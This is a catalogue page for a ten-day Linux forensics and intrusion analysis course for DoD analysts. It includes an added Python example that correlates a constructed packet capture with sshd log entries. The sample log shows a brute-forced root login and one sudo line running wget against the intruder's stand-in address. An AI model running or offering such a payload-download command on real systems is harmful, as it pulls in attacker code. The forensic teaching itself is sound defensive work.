IT270, Forensics and Intrusions in a Linux Environment (FILE)
Who Should Attend:
DoD and federal law enforcement intrusion analysts.
Prerequisites:
TT110 (INCH), RT120 (CIRC) and FT210 (WFE-E) or
FT215 (WFE-FTK) or Test Outs
Duration:
10 Days
Course Description:
FILE is a scenario-based course that teaches students how to conduct detailed Linux-based data analysis in a laboratory environment. Students conduct forensic media analysis and log file analysis to determine the specifics of a Linux-based intrusion. Topics also include the attack methodologies an analyst must understand in order to reconstruct an intrusion, as well as case preparation and management.
Objectives:
- Using tools and analysis techniques presented in class, analyze network traffic of an intruder and correlate the findings with forensic evidence found on a Linux victim machine
- Prepare a forensic examination system running the Linux operating environment
- Analyze a compromised system running the Linux operating environment by examining both system artifacts and log files
- Complete a detailed intrusion analysis report
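The first objective above, correlating an intruder's network traffic with evidence on the Linux victim, is the kind of analysis the course exercises. The following is an added illustration, not course material: it pairs a constructed list of connections (in the shape of a Wireshark/tshark conversation export) with constructed /var/log/auth.log lines from a hypothetical victim host named "victim", matching on source IP, destination port 22 and a small time window. The IP addresses, timestamps and usernames are made up for the example; syslog entries carry no year, so the year is supplied from the capture.

```python
"""Correlate intruder network connections with victim-host log evidence.

Added example, not part of the course. All sample data below is constructed.
"""
import re
from datetime import datetime, timedelta

# Constructed: connections exported from a capture (start time, src, dst, dport).
CONNECTIONS = [
    ("2024-03-11 02:14:05", "203.0.113.7", "192.168.1.20", 22),
    ("2024-03-11 02:14:09", "203.0.113.7", "192.168.1.20", 22),
    ("2024-03-11 02:16:41", "203.0.113.7", "192.168.1.20", 22),
    ("2024-03-11 02:30:12", "198.51.100.9", "192.168.1.20", 80),
]

# Constructed: /var/log/auth.log lines from the hypothetical victim (syslog format).
AUTH_LOG = """\
Mar 11 02:14:06 victim sshd[2110]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Mar 11 02:14:10 victim sshd[2112]: Failed password for root from 203.0.113.7 port 51024 ssh2
Mar 11 02:16:42 victim sshd[2119]: Accepted password for root from 203.0.113.7 port 51031 ssh2
Mar 11 02:17:03 victim sudo:     root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.7/x
"""

# sshd authentication outcome lines (OpenSSH "Accepted/Failed <method> for [invalid user] <user> from <ip> port <n>").
SSHD_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port (?P<port>\d+)"
)


def parse_auth_log(text, year):
    """Extract sshd authentication events; the year comes from the caller because syslog omits it."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue  # sudo, cron, etc. are not sshd auth outcomes
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"],
                       "ip": m["ip"], "port": int(m["port"])})
    return events


def parse_connections(rows):
    """Turn the exported (time, src, dst, dport) rows into dicts with datetime timestamps."""
    return [{"ts": datetime.strptime(t, "%Y-%m-%d %H:%M:%S"), "src": s, "dst": d, "dport": p}
            for t, s, d, p in rows]


def correlate(events, connections, window=timedelta(seconds=5)):
    """Pair each sshd event with the closest SSH connection from the same source IP within the window.

    A None partner means the host recorded a login attempt the capture did not see
    (a capture gap or a different path in), which is itself a finding to report.
    """
    matches = []
    for ev in events:
        candidates = [c for c in connections
                      if c["src"] == ev["ip"] and c["dport"] == 22
                      and abs(c["ts"] - ev["ts"]) <= window]
        best = min(candidates, key=lambda c: abs(c["ts"] - ev["ts"]), default=None)
        matches.append((ev, best))
    return matches


def summarize(matches):
    """Per-source-IP view: failed/accepted counts, first/last activity, and events without network corroboration."""
    summary = {}
    for ev, conn in matches:
        s = summary.setdefault(ev["ip"], {"failed": 0, "accepted": 0, "unmatched": 0,
                                          "first": ev["ts"], "last": ev["ts"]})
        s[ev["result"].lower()] += 1
        if conn is None:
            s["unmatched"] += 1
        s["first"] = min(s["first"], ev["ts"])
        s["last"] = max(s["last"], ev["ts"])
    return summary


if __name__ == "__main__":
    report = summarize(correlate(parse_auth_log(AUTH_LOG, 2024), parse_connections(CONNECTIONS)))
    for ip, s in report.items():
        print(f"{ip}: {s['failed']} failed, {s['accepted']} accepted, "
              f"{s['unmatched']} without capture match, {s['first']} .. {s['last']}")
```

In a real case the connection rows would come from the capture (for example a tshark conversation export) and the log from the forensic image, and the time window would be chosen after checking clock offset between the sensor and the victim; the unmatched count is the cue to look for capture gaps or an alternate ingress path rather than a reason to discard the host evidence.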
Topics Covered:
Network Architecture and Information Assurance
- Network Architecture Basics, including LAN/WAN Topologies and Network Services
- Introduction to Wireshark and Creating Filters
- Network and Application Protocol Analysis
Identifying an Intrusion
- Computer Intrusions, Goals, Attacker Profiles and Intrusion Phases
- The Goals, Strategies and Techniques of Reconnaissance, Attack, Entrenchment and Abuse
Case Management and Investigative Methodology
- Investigating Using the Scientific Method
- Documentation
System Preparation and Forensic Analysis
- The Linux File System and fundamentals of Linux Artifact Analysis
- Forensic System Setup
- Analyzing First Responder Data
- Beginning a case with The Sleuth Kit and Autopsy
- Keyword Searching
- Malicious Code Analysis
Network Device Analysis
- Fundamentals of Network Artifact Analysis
- Network Device Artifact Analysis
- Network Traffic Capture Analysis